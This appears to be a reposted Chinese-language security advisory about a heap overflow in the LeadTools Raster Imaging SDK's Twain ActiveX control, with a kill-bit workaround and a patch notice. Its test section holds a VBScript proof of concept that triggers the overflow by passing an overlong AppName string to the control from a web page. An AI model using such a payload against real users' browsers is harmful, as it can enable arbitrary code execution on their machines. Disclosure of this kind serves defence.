发布日期：2010-08-30
更新日期：2010-08-31

受影响系统：

LeadTools Raster Image SDK 16.5

描述：

---

BUGTRAQ  ID: 42823

LEADTOOLS Raster Imaging SDK是用于创建图形应用程序的开发工具包。

LEADTOOLS Raster Imaging SDK所提供的Raster Twain对象库（LtocxTwainu.dll）没有正确地处理AppName属性值。用户受骗访问了恶意网页并传送了超长字符串就可以触发堆溢出，导致执行任意代码。

<*来源：Gjoko Krstic （liquidworm@gmail.com）
  
  链接：http://secunia.com/advisories/41177/
        http://www.exploit-db.com/exploits/14824/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />  

<script language='vbscript'>  

targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"  

prototype  = "Property Let AppName As String"  

memberName = "AppName"  

progid     = "LTRASTERTWAINLib_U.LEADRasterTwain_U"  

argCount   = 1  

arg1=String(9236, "A")  

target.AppName = arg1  

</script>

建议：

---

临时解决方法：

* 为clsid 00165752-B1BA-11CE-ABC6-F5B2E79D9E3F设置kill bit。

厂商补丁：

LeadTools
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.leadtools.com

浏览次数：2944
严重程度：0（网友投票）